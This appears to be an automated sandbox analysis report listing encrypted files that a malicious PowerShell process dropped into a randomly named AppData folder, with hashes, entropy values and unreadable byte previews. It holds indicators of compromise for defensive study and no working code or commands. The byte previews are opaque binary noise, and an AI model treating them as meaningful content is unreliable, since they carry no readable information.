                                                                                                    Preview: rF.f..Y.oX.9....b...H...V.....{..a0....a....]V.]2..*Y*Y?.$..tq....'..r..7...r..(.@JQ......E..W#...m.(..K..V.....K.Q.m.E....r...e..~}M.+_....:s.........:MJ.mxy.Y.Q...r..%4h..mU....&...]SC/....9C...B.....[7....{....{*..B.vhM.del.J.....z%.O...-...n...h..x.[.-{....2.?......f. .9.b..K..#Ml...FG..Qr.m...u....F.Q....Q.W..:..g.C...j..5..- .`..V2..n>?.....,.VR..\A..x..z..7...zgbl..P.....b|....#A.KB.....@.....J..6...A..>.j...v...j.A..+S...........M...F.X.e.R..|fcA;...N.fu/....k........'...2.j[...H.xq.D........K.b.?...0d.B!......+.7#P.,...#..j........A{.......L<.<.?}....j....^..<..(.....#~?..-g....b.~.|.4...O=.C.A........\.J......o.u..k...."%...Y".'./..U...v..i....9.S{e....$T?.(.V..?..l]n..E.`.o..vh.....(.[.nu.$.x.dJ.v\.B.2.Z\d..(........PB..M{Z.....H..ew..o....o..0.[Alk.>.LZ..H.u..F2...[5>2.)b.b.h-]...j.8..K.N..-.U...T....9...@..Z.T...\i.~...j..W..0....T1.#.CR....h3..=#. ..?...*.H..A...A.CF.;.....$......y.b..e...ulCSV}-....3.D.N...o..4.Tc,FB<....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\imvWkXOAGxfTzHJ.jcdIsOiMhXfJW
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):176673
                                                                                                    Entropy (8bit):7.999034684742172
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:1AUQyp91SDg3ZT0RngiqBoRyJ1fcfbC0XlNW:PfpGwqdgiqaCkf2V
                                                                                                    MD5:4AA8F20F3782C293904705F78E50D14B
                                                                                                    SHA1:2DABEBE79F2EF885BCF4783F81FC3ACFE72FEE92
                                                                                                    SHA-256:FA212B529F6D4352AAEBDCF349C423EE8EB7F314D374BA98A3829B8D2AC1B6D8
                                                                                                    SHA-512:FFB63753044FD3165150FCDAD0E78FC3B92B8148F550D38878C898DAF67431950BEF1B7B28DF401950D03D452001594182B62704CD8E4037EEAF97B56950F5CB
                                                                                                    Malicious:true
                                                                                                    Preview: l......^.v../.....Y[.&U.3...D........<.C..J..k;t..${\...e/.)/.....K>)........9....][TiC_.........t...J..K.G.t.+s.t...BR...2CH(..)x0......s.."z..TA.e...h"......#.E...f...E.H2....V..:........x.............6...+.....B.m#..#.uuE....e.Dg.I...G.m..8.....).I.+)*....&[.T....~..^....<A.....(.l...-b.G......;....z.e.....,b..7..w.Tn..X..r..[RiW..V...1..9.!?.HI..r`.....^."h....P....k#."`..`.y7.E..<.uA..1D.o...0u.eH]WO.x..Td.s.WC.&.ak...9.H..../7....N..v.M.....m..^.G.E..pN..F.4z...Z.+.vUW.....A..#~..70%X.#..i."....^3(.m.da.*.q5cV/..#.k.:SOz...0./.:...............v..k.`.}.s..ul.`...[.gt...........?`G=./.!..NNm3.@Rr..a.JH:.d._.}.. D..MR.R..Y.E..&^.........p..8r........).l..~.3.z.....B~..z...B.-bx....f..q..v.=..7}...,B$.>a.gQ..{KZG..>.....D.......$(!..>.%K....6G.........*.....`."ia]._..Q"<...h..cQy7...a.j>n~Z...?./...w...MN6$j&._..].v........{...3.h.."....4..WK.(.T.z2....#S...d{..T.N.;.`.sX..el.R.~.<.7..S.g5C..Pd...>...I.+.....~=.xv...9p<w*...Z_.uOxHe:".'..@@.S.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\izvsHgjKaODwlLAe.BIinjAgYuOvcbrRhE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):180077
                                                                                                    Entropy (8bit):7.999066185997927
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:RgRSQJoNEwTSi7moqyZtGUc+eykvjCGce84/rbBAGOq3ozzQscOxgLQdYz/ri:ORSQJo1m+dc1YAWCHLQdYz/m
                                                                                                    MD5:5A34D8F5D9AAF8E833E5D579A8851472
                                                                                                    SHA1:50E870B29E08CB98787321716143D4B2E5D1A661
                                                                                                    SHA-256:173BAD1F11B89090EE9CBAEE3C21705A7BF702852C637821F820577EDB5B6491
                                                                                                    SHA-512:02F1B2886198617B9D81B6733E11EE4202925239C6028DC6DB449EF6536FB7825A3F153A7652367C02A9DB9D8D46A6A7F389695FC0DB703FC873D7DC5ED62F9E
                                                                                                    Malicious:true
                                                                                                    Preview: .....9..N..v..L.\#...F.d...UY......8yf..g..i)p.B3Bh.....%m.-.r.o..<....iP..k[..%......@..9.T.. k..P.R.'U2.B.....b.P>..4|..g...J.WS.P;.qZ|l.rB ..e..,........6!.p ...L&$..S....tGkD..z.d..G|..$Z..R.Z.k?.._.AU...xg...\.5D..V../%....P.A.ke.Nb4.EW62.. ..%.f...0o.G2....`...W........l.....yq..M4U2...q...Y...J?...}.7r..r......<...........)........T.....p.{Y<H.+...^..?I".;....t..0tA...Xsn..~.Y....T..E..h...v(Z..T..../5y.}>...;b'.K_..<...|.$U.....#.8...f6....R.O].W.....M...b'..$lu?....0^.oF.*h...J...0..!%<.....s.B..{.W0...n.&./...sa...r[.Z....GL%...s..g..|G..v...{3.".{c...[.B.w..^j..aZ*+......cH..b...M.. .T....]ET..W....j..Iq....e..G...up..6....N ..1B...@.(l......).:...hE..i.z.V"...#T.6v@.....L...Y..s&....|.M.....Z.....W._....+......&I..;....C=..w.`..jE..Q2g..1LNq...u..xl.T.......x...:....,..u...'.[.....Z..d4.......P5p..K...2. .1)e.x...~.SC.Eh..G.\D&)..Uk...C^njM.[.oD.1..?.Lg.;.Ey..<!.....R..u......k.q....".t0..g....XH0...qL....b{.0/......V...t.>
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jRTFwtHxZzfQk.JIZsoypMCETBGXlh
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):156811
                                                                                                    Entropy (8bit):7.998884337908279
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ekF8LGTTyf8BnsqEhcBVVCe6pJzOGdGFfo+RIuExdy4CcbCYnoV:ekKLdhu8ptwJIuuCcZoV
                                                                                                    MD5:34B6142BDF0768219D8010C0C5841365
                                                                                                    SHA1:65006A9F68AEA0A8B72C4906B2131CA6B4732CF5
                                                                                                    SHA-256:55BC91043DBA3845191E1BF03CBE192A05B0EABB6F9B100CE308DB8A362673AF
                                                                                                    SHA-512:66BAE8B765EE607F1A49A18954CBA1E6A5FE68FA85AD2B2123A2EAAB092DEFE114C146C67791B8D91AA818FA755F734DDC14F4B498C7854A606695BC04A773B3
                                                                                                    Malicious:true
                                                                                                    Preview: ..%).....R...0.{..w5...7.g.5....dnD.*w........)$.T..YE.9..Y...(F....$P.b..$.,u.>.0...'...$<...n...4..8....+.4.xE..|."=e.......r.um.A...P.:h[.....!.uU.}.W....Y. ..6>@X+'......cP#.Q...Ds..Hq.j..r.....x.......M{.....\..h..A}B.*.......8k.....F.....A......I.>..MS..#(..$c........s.~ ........[...}.0j..y.z....r.IOP.7-.....5.` . l..#....D..*....I.O.......E...R8..-.....{....V....`.^u....._........3).M..`.B....._..@.$7G.(.....q. .6.....D.2.+..C..%...[..........,.)w.n.z.w....}z.hc..k.. .....s....P6.=...&.#..B3QgP.bN.I.z.n...E#..*..*..D}. UA..P#.u1.....$M8f.......`%..3...Z*,9.p.v.X.$..l.:...C9........:.....r..f/..i.L.Q.3...|......[..OC.&p.j.u..G.D........{z.u...h..o%.y.....|l.x.......87..r....i..`e.....$..:z6........b.$....o. ..R'...`...'......S..&.........z...s...u.;...<...Tzy....?\..{^.....m}...Vi,Q.....t... %P.....4 (.~......#PgI.;s#V..a...T...K.o.0.Kj....1t...W..k.o...B*..;...o....;H0.0 ..k.7.;.)|.q<Y.. Q..o.z..f..#..s(m.M~...ed..).d.u:`Z+.R./3
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jSIcBHGhQXNk.pQrstCqiKoeTbV
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99798
                                                                                                    Entropy (8bit):7.998151152030483
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:y7vFRo7qKFrf3rnYI4n2KAEaMXnsKccqcfpznEmlCCCAlSNjjYINku1BD6kd0BYI:y7vbGZvranKhMXsK6cBnFECjKy/GQYiP
                                                                                                    MD5:A9C7C12B3BFAF46E499DF043BC1B502A
                                                                                                    SHA1:E8B1161D90930F2866A43054BE5B051AE5349B03
                                                                                                    SHA-256:4FE46D9ED66BF50036DCDD34F39BECE327A9491EAD9920702E7AA13C6EF5040A
                                                                                                    SHA-512:D9C352CC348B643E9A433B6DE3832666A24E987A142BE86C190058764E78FBA73D3F6B02647F1709120CFA8189849E2B83B774E76901403C993CF9B6BC83F2E8
                                                                                                    Malicious:true
                                                                                                    Preview: .+......r.BN.!J..L.lAP..@.A.G..zE.S.........6.n,....CB...Zz.*.r.F.<|..p..O#.....6..6.4;..aM..yQf.2...t.u....P.....%...@}.........7..vr.D.F._hZv.|.A..*o..ea..#y6&RhBb..M.^.w..ZARY.L9.v.....v.".)B..\....C.t.o..|{[.,.*.....I.i..fcR2.?M....S.+P.....`,.*n.Q..H&a...\.I...oUr1L}...."..:J'.1..^.I.t#.T?u}9..."F..T.........T-9.....x.D..S..c....8.z...XU..!P.P....=<P..W=6.jm^.i..%.R/..#.}...H......7k.5z...th.[N+.s...x.=.:.9.B..z.N....9c...H..j83!..h@....%..b.qrV....|K..W.##......t.>5}...Et.P..Jp..]Hn......kbK......r...a#N.p...Q(...qE.(.V..~s.[..qOF.W...J^......:6..G]..T..S.U:...*.....hN.I..d8.U.Q.\jH.4....S...k..x.Z.c.......w.1G.S...._^..w.LU)KN.....?._.."z!t..m-.;.5.+....*ND.T...l~.=..|.f5.....^..I'd{iY.6?.......C2.H...}|BR...*.zz^...h......>p.C.,.]..].....o;.........\. ......%...C~....(..-)aZ+.._.e~...o.P4...Y.D.D;C!....um......2&x%..zb...}H.F....>Uyw..Ty..!.&......-.y-.....N%D..x.g.r.'.\+..P.Z*..gK.3..oo....I..7...L......&/Y\$!.vbvD..7..H:`Scy..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jayVmLblhkc.VAhdWSvapN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):154448
                                                                                                    Entropy (8bit):7.998776363954113
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:Zag49DhGU5T40GpPFYTJCHuGhjChdHXsTnAk8GRQLGnFB6dOO5PC8:ZKhfGLYnAuoAk8+f6dFPP
                                                                                                    MD5:41DDEAE858D25B31FF6C185DFB6D08A5
                                                                                                    SHA1:9593BBCCE0A32D38BC1BAE929001F9FE7787F3AE
                                                                                                    SHA-256:3048B2AF42CF815083070A44A084941CD1696F1881C986996B59AF58B9A4ACE2
                                                                                                    SHA-512:24AC4785926DA93F95A08FF4564DFC372A973C0E1B190783FA5C715F8310AF3929927A3D381743C56C58179D2F6294328BCD879AC6367C11634676B9211019BC
                                                                                                    Malicious:true
                                                                                                    Preview: .M.(..........n.Z..1.9D...zg...4#.r.-..V..`..-..m:...c..]..l..F.o....B.)..8..8.._..a..v..0....^h?...*...=..j.f.WD..T5.c..;.~...y"g...u..&NkC.G....l.C....\....g...k...:.<../...9.....d..J.m.V.W........gK.....f...K.V....b..X.s.H...-<..zK.\.ey...a......!.\....sVK..d..Zc....\.<J...@....C.U.X..H.-....*....j.s._.d...t.&Xu.......M.....d.2.f..&A....c..]pP3..!...N.......{B..?.....U..T.)4Q.Y.yA/..Xn..!#[~v..e....k...c...F...e.5t..>Y4.&.`.@CGC\S.q.^.Q?.A.|vc......Tqe$)..u......q....e...Y...eR.g}.Q..9.N=~.....[%.../aT....J.I>-(.mp..Am..N>..KX[?x.G...Xn{J.nZ....7..t..I...H....3.^}.Co.#.w...o!p.|...F.L%.....l.#~.'D...Q..v.sX.~.T.P...,.I....j2...gIr....u.!6.Z...5..f..MC.....C..g#4.d.I......rBS4c...NO$.L..}..=...Q...?:.5..E...e'...hI7%.-....ucHS^..`..gia......l\.....[...!.S............KR...f..K.]Z)....EV..kg..._.r^..-R..^*t......n...[.............G-..0..>..f...a.....d. .wM./p..mA.H.+.....M`.J....N..#.?.....$.J.P..#.....k..7.....x.rq..{..4...{.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jdFnskeygVvUmMCB.FxcvjClqLJwMuZR
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):141487
                                                                                                    Entropy (8bit):7.998792359600219
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:6UFBoiWxoI3DSfC8m/V18fuIICKOEeXrYYwZS0cV+lMR8lzi+VUp8Of:6UFBoi1I3OfC8m/V18fpEeXMYwZSw5i9
                                                                                                    MD5:4675BE57A23C4CD9723277A2979599A0
                                                                                                    SHA1:0D7C4DC88BE4FAC19780F1DDC911DA9DFF79F63F
                                                                                                    SHA-256:F5F97E7B180FE521E7D3039E4A84DC6ECB24394132BD8D000A19714B418D1BD4
                                                                                                    SHA-512:2125031A5762A7CCCD68FCCAD4117B83FFF1C701C0708AFD7F7698DE7061BC1F6F298ACD36C005C95AC238D852FDC84296829B9B5A0D0127A885FBCC036CC2EB
                                                                                                    Malicious:true
                                                                                                    Preview: .... .]...<.[.6.|..*......_d|..]..'....3wDp..N..T.`.QG.Y..uI.T.J.....&n&\<.a.6.}......K.3...~.Ve).D.!-2:...B...[...N.8V.X.r......9<.e...o.S.K...i.H..X..d.c.$V,..uk..R[4....|.....Uf..(L[^.u ..].^.G.o....+. d..G.@.....Cr...j..o.n7.)t>....+.........eO.f.#.T!,..(.sw..2;..F.,...L..........[.zh.8...Td}{.Z.....6.H.p.........,..d....dBs..[t..$....p.....T..|_jRxi:.T{.d.L/....HHw.*l.:.........Qs.L.a9j<(.C.C.).U4..(.\.+..q..Q%.....=..D...J.l.....(g^L..=..Zm...._.L..:.=.Q|M.. .=..9k..M..`.....G..hI. B.....9.....G.......8...S+....JC./.'n..P]...Y......>.f$......FZ.....k.....@.R..+......+.3q].1m..."........L<2........e..oB}N.sU&..+.E.z.A...e....x...t....H.8...p..=1...T.'m..p`.V1....>@1=.3h.O....qGz...E......t...hS....R..s.....\.....K._+..A...k(..%rV(}9YZi.8.k....U.......z./.m.BL6|]...Y.zW...9.$......Xr..*...I4...3|G.H.:..{m}..aQ...Z&....o.0%.jV......e.(.I.H..^..a...bNY.KHlc..1...=....i.....UX^.....[....s.g...>.{Jb..r....{y.....'...m.....$.......
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jdrXyZweGIpOvWn.begEGqBwYxy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97332
                                                                                                    Entropy (8bit):7.998199626197082
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:xljRDcLXohIckdnTA9emJSS4cG8mMiK/WCLCFSTwT23SOfoRaPr3/jAHFBV:vjRDyXoc09emmdC2FSTw2jfoqMHFBV
                                                                                                    MD5:AA52F76E386277E99E9C8E1EFE549301
                                                                                                    SHA1:0C95C5F7D46C76451CCA660D0C987A4ABB4EAC78
                                                                                                    SHA-256:70FECAF944BB83786A9D4CE8BA5C245DFEB7C19EE1DBBA0AAD9AFCBBD36D2651
                                                                                                    SHA-512:3743DCEA179B25AA947D9AF1F3BDCDE04CA04DA816590B58C98051E061D7D6A8E6B9CA6C7C180AC33FAC811F39CDF18FF37E082834319AF27BE47FA4594AB3ED
                                                                                                    Malicious:true
                                                                                                    Preview: .....w..mNM.w..^T.c.......Lw.fq/......o.)c1....Ax.m9..:..h...oG..:...u.>\...?.m..$..n..H.f..{......4....1-5f.....v..\a....}Y...s.r.....r@..{..d....K...B.l...#....1.{.GP...u..q..\....!....k.._P.........L..H.L..V'.....~t..,.$....v......O......)..1...L...\...s.x.H[..&."3.....^$...d.?...-....E..........=.M......4bA../.s.j^#~..x.v.V..z.M'.'......DM....gz00....y%..o.U.o....g.``...+.t...dJ.3..@F};.S..].Y|O...../..N.......<fy.l.pM..g}o.....Q.y.t5.i.7x......~G)...Q8..]..E<..`.w.Ks.B.........'.-.;.....3...KZ..2..k.Xc...11..x&2...Zu(.aQ..v?E...~..E...F....y..c...y3.p........J..HpB...].@.\Qj.]..VFK4Q.>Y.W.....z.!0....h_Z...H.j......EU...lD@.8..P..)F..E......w.f......#..|(W....[whF-..Q..T.x.../(.uu.........z(x.j.h.\7.0..Cq...(k....d..[..4.{+:.p....gD*.j7*.P.g.......|O.'..6.l.Z..j<VXpOf1.o%.l.e..$...*.H.OQ.C.U.No...+_......7..B..V..?$.T!.e...q..e.....s.^8r..L0...].ns.9.a...d89..c......Y..5.U...c.Y'..C...q...,...........~.e-O-..;&.nW.<{..+..O..i\.h..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jfVoIqeklhQztdDpWGm.pvrjMiyImKqN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):166639
                                                                                                    Entropy (8bit):7.998923301216638
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:vZngwf0HpYvNMo+Y7rNbTGZ2zBlXRKXb+CRgX42Qz9QrqBSEE57QuBMGpZ:vZti4rRNztub9Rgiz9lSEE50ypZ
                                                                                                    MD5:00E848DAF9F5930B400D5FB8A341C370
                                                                                                    SHA1:2035E02440581AF9ED244D80A33F81F9087DCD7F
                                                                                                    SHA-256:876A83706A19BE6EE987259A4329A973AC1E8EED52DE176C10EAFBC580FC9A9D
                                                                                                    SHA-512:B66BF4EDA1E93AF753731CE23E2EBF319A36C715F9A7DCB328765C172DFDAC0F708AAC364F0268F08B5D6DE6FB2737F45BC661E74CF11672273035AA14982BC6
                                                                                                    Malicious:true
                                                                                                    Preview: yn9f..e.e..]H.h. .@^'.U......^#..~.....M..L9?..f..?.^........[6...A....X..."..e.fzO5...0ig.,/.e=.E.x..G... k$.....|m...e..`...)..Shu...2!q7.Q.v...^..1.\Am.w.g.G..i.A..;.V...!...X.V..3.O....z.ro.,A....G=...ng...HE.\R.}.0.6.F.....9...HaI..3Qb..*)......".-tYn.zy...)o6.....Of....lU$..&......\....[.......6j.8..Q.$T....=....TA.7R..axhP......(P...e.n:...6..j.(..-..3....{.|...xXFj.~`.2....y.lE...,a...B8....i..I<..p.{.,......t.,.L.j........)#...7...k..k{lA.f.....-.p.s.\.V....[.....W...e#h..7"%...Q/.Q......~.....!P...m...N.pe.V.GZ.5....&.....O....\yf...)m2w{.F....II'........`1.\..p..Ev..,.M.?9N/RY.....e..K.....@...V.......1.s.n....S........ad..,;t....B.."6...n.<c...j&...3...D.p2-%=.K.b.B..Y..y'6w?j...-..l...I.M.H.a./..(},..K...u0.#.r.S..<3....B...H.c...TB.!.i......8........>......,{dA..Z...c.........ZG!..W...<...d o.eX..g+..#.pP..Z.T<.Dy.q?..Te..0.._c1...tv...O..S...:.....1.#..........e...GJ.....mRc;..._.S...c<...<.`5..'i..Fyk}3.`...TN.]K.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jfdFmxnYhrLDZtHXb.gPIvndFeMAjyOsxLNz
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):168158
                                                                                                    Entropy (8bit):7.998928110495741
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:ZWn7NF5wIanFPNW2Sb/E+ucR7u52xZ9KHcA7caO1+7EzpjUn4qsjaWCsrpc+n:Z8NqnFPd2NucRypD+Ay24DeWpn
                                                                                                    MD5:8520B05B4DEF35BE568E9E3ABD85970F
                                                                                                    SHA1:6BD7CF6058EDE39526D41F26F6D44CFB1DCA0E95
                                                                                                    SHA-256:49B24C948B5B36E6A28103AC45ED9197F4DA4180C00F794419DE5B75D61744EE
                                                                                                    SHA-512:33891132913714C14238AA719E0EC0CCD60CCE70C2525A19E7AE5F85BF5AC556CE870A67DA9222FB027440D9C3A63A801F4D643FBBBFAB3F76919A326D216359
                                                                                                    Malicious:true
                                                                                                    Preview: .n.7.>...{r{.=..A.}.2.:.=......5Y.yB....a..y.k]..q.!.VD.pp.....FX.6pF...#....E..~4..n.5q....U%.._K'~.8 .73....;bo..2.X....].....;&..*.z...b.....l8su.&......>/@R..8.&&?A...._.\.D....^....Q.!......E.34*'.YE?........W.(Pn\.w,z.m.^!PR..|.7.?.x/.W;v!.).,......jG.T..D'........-. ........]..(;\......O+F=.e.4.....fWG...%.H8...k...Qfr...HB1..(2.6.0..q.?.....y...,.X= .....ju...%...uP.I............u.B.r....Q...J..OEi5(..?.....|j...2B$S=....~...gJu.?.=M2..>/.ubt.YP_p...O.I...;..Z1..y....hDw..F.G.F..Nm..d...].rh5Cmv..[j...;....<....d.!.:.cB...N..4..fDv...W..xs..hO.a.T..Z.=.<6J...k.i...&.2_...N.....P|C..=93mj."..._.{.:..] K.n:~.L.]..^....p.%=.W.`]..gI....!.....k...c.-./F..7.... ...JG.s.t...Ee.W..\... ....]%........WpFK.x...l....+..\.lD...7m...>.Q...r..../B...$..s.!.X.pa@e.............vW'...D..".lw.>.#d=1v.2&...*...%....0....4.C.%H.'....$.z...Z`.....3..5....o...;+i..../u.#..v=..YE....5.....s.w+.......u..aR.9\..&..%..4M.6..jrZk....\...i.11.-.bMC....
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jtOReEHivLrk.ucwhOsZipDFfrSMQX
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):83250
                                                                                                    Entropy (8bit):7.997477392022862
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:8WNcaSzj62pBlvvHw9D9kR3LkgFsnawGl4YaiU04yg7JQlXaegvGs:ntMddHwC39sOy5k4ygOpa/N
                                                                                                    MD5:F4970C0721AE98D7AC222ECDA643A9A6
                                                                                                    SHA1:654BA6A1845D90387185EBF8C52DFEFFA9459CED
                                                                                                    SHA-256:6A9508A6F3D05466603EC7728C8DB1C472C7A48A020242B6F9E3B5B6C1879618
                                                                                                    SHA-512:3EB2A511E9C977ADA8FA08622E726E8A82F4E8606A993E905AE10A42E910AFC0B7DDB412048715993F207A22716CC2EBFB31B7044FC276CDCDAAC3E203E6DABC
                                                                                                    Malicious:true
                                                                                                    Preview: wH...K......+B!...'..........$<=..H%V....h.....k<.Gs3H..7......GL.ff\O..+.:.'....~..kir:i.V...pD.~.g...lDG..G.8...w..Q.<.+.0.G:......]o.O.#Nd......a*0..si......D..c......8.K)r>.gWu.Y..R>...B.,.-.qc.L`....0.q....oy.]S...(.p.5.M........,.Q..*G.B.mV~...v8.;.r%.S7...x...&.d..._.-M.....'..?.|...y.S".E....lm*..$D...h..l..U.KlB.) ....F..<.7.Z.Xu..{.{.d..nk.......Q...EQ....'.)..{V..&..H~m.a.,X......u.*>..~c.Dw.!8<T.@6PP.l.X....e............5.}..=.....:.....!3.x.VA..!.5..o...pXl9.........M.`.V..lCH..p.b.\b.t..l.G.......x.3...).o.m.].l.V..f>k UX... X...R).....dRM%..T.W.......=R.hN...r.|..kP.]A...2..34.z6..aBa.5.5nq.X..J.c.C......5.-i....f@......`..S.....$......l......tD./.....P..S..0...u;z.t...O..[.g..D....+.A..<..d.X..W.n..."..'.2"..hO5..Ib...N.....i..K...&.L....V...'Y.0....1..L.`])...h...<@F....9.">.jtU.[.8.j.=[<.....P33.....#`.*......XG\0...l$.vr..v.eeu..K.u.....A*h...7......h#X.>..^32.D...BE.X.K.4/..5x.\..."Q..G....5...f..g.....$y.{..w...D
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kPHhDNjVRlJbpWLw.uxhfYMvmcPOqQ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):173057
                                                                                                    Entropy (8bit):7.999071234667975
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:HVrt+gAlNy/7q3NubKJKjhyvzu7fNyLxv+77BL/X9GbcB:HJtslNyzq3+TlypxvGl/McB
                                                                                                    MD5:2E4F2AA447DEE3CB936307F46C0C7CE2
                                                                                                    SHA1:497E18DC05541696AAA195C99A11D4BD3DB1BA9A
                                                                                                    SHA-256:AFDACD5E7C89811B66862ADE43090CD4122BB6DBD4E6FAED75189467F32843DD
                                                                                                    SHA-512:40D9C06C3528011CFB06E61E87CC59ABEAFB1A1D7D71DA76D18824819AE48BE235F4EF593ED23570EE641C3DB0D96584B09453DA74AC1A1205DF2199B441380A
                                                                                                    Malicious:true
                                                                                                    Preview: ..R.........(kq...ie.+.c.A.r.V.p....<.....*C......i.. r&.e/..4......<.B.j......F.s.........uSxC./..W.*..O.g.%&.iX...Q.x.5.k.F.@\n....@I Sr.1?.2g...]..J_..J...'w...{iav.W..GPS.9.)f....w.'.;.i...*.N.NA...l.w?.....x0.l.A.:.u.<.)..u.Eg...v.m...>jP....r....g....&Wi.Y.:3bv.F.)....7/y...~>..)...W.^ ..>.....S........|..f..S6............p..'"+.>.....pF.........c..|.H.u.D.`.8}.I..z...K....|...J..kIL.a.4v..OZ.aK.I..K...%..2.j..Q.y.....e35.e....^....l;&/C.+....a.^0..&.Kz....m(.k..26....qW..(.....{...9~ w{&E.l...~*.FS..ZBR...0y.B.......a.+...E....?(.C..<..=.\.*..r7...gN~...Q.{c.0...{....$.q.7...6.._....u.....k.I...Q).4...>.....F...J:..C%b0.c.&}......a....,.+.....]<.....yP.]6...^....P...F64.... .<4.%.#>....&c}...m.....C...{.G..J.....T... ....Q..+.G....`.tL.D.2!....U...$...xO.c....?..K..j.?....F.....9.(.*.v.%.|...r|..V`>..nH.g.1..R....F.}.DA.L.V^..a.u...t_-^rf.*..e.et...I^.....g.h.is3.].x....|....d`...M7..x....}\.Ez1...A...X.^. ....|.%..NZ.lxv
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kYmAclZxQFBMaEdTjK.igzOmbvRhMplPTVntAd
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):195433
                                                                                                    Entropy (8bit):7.998972015715575
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:NcMSqF5ZSwDhHNgwURgBo4PxGbi1tqdqQB3KInPoCtJ2dfNFmC6IV5Wn:eMSqF5ZzhH22o4PxGm1y3oFQIVs
                                                                                                    MD5:DB90439FA0A27C3E1576B4FBDB2AAF1D
                                                                                                    SHA1:27D9FB69B967B63A20E0A751AEC13DB03F198BD8
                                                                                                    SHA-256:63CB5B097C07D18623D05A4EE09A92AE199F81041AD8CDE06176C34B689FD871
                                                                                                    SHA-512:51E989B55608A0F591531E8E5CB4E5270588815774BC275E7515BADAE0E42939EE55F7AEBA091F6D178D3379445E565CA6283CD810D6A6388A66EFA1574765FB
                                                                                                    Malicious:true
                                                                                                    Preview: v.fp._.j...K..X....!!..l...u.K.P.x(h..3.....^'......T.....U<.R....@0.URk....l...u.....f..d.$...Mi7dM...8Kb..........s..?.-.....4XO.........'7+.~..e....+..a.I*b....>.6.e...r..V..*..t....}.8.S.j.xpQe.s..$.7h..g.+.T..9..|J..,....{...c%.P..Y+x..x5i.z?j{.=....GA_.w...{....M.".@G....L.Mz..d.~.=p..%....x3.V.o..y_Ry....)....G....(.>(.....H.]..E/..... ....1*..@.&:6u....2.g-.....(.A.g.9.1..2K..;...V..2.c.n<...@>..C[M.&<.......#...[yUt..Ta...e..!..O.q...}...?.......>jU.^.a.X...>f.E.v.....C.n5.H....<...x.B[[%.<..Xew.=....&.a.>.9........X.bZ...n.2..J..t. .R....hcS.....3..ade..H...n..-.o..<dx.F..p.o.....e...\...t%.o]A..4lJ.s.Wm.t&.=>WH~..31U...m2......{jX.CPK.....G6...$...P0...........t..X3Cx%.........'j=m...&.R.s..b1W.2............%..#6_e.k.d&l........:\\.x?.q.`.M..?........t^*.R.:........_..r.W:..n.?$..u.'N....I'=5.y ..3.r.!.$X.........P.....|0..p.....^z.T......8r^'K.(.l.s.o\..&.4.5.F.o@.%....a....P../.}..=...9..lT+.o.p-..g.....Plt!...Z.d.KE.o.f
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kZpiRdlxGE.oLGAmQKIJEOC
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):139056
                                                                                                    Entropy (8bit):7.998532030020673
                                                                                                    Encrypted:true
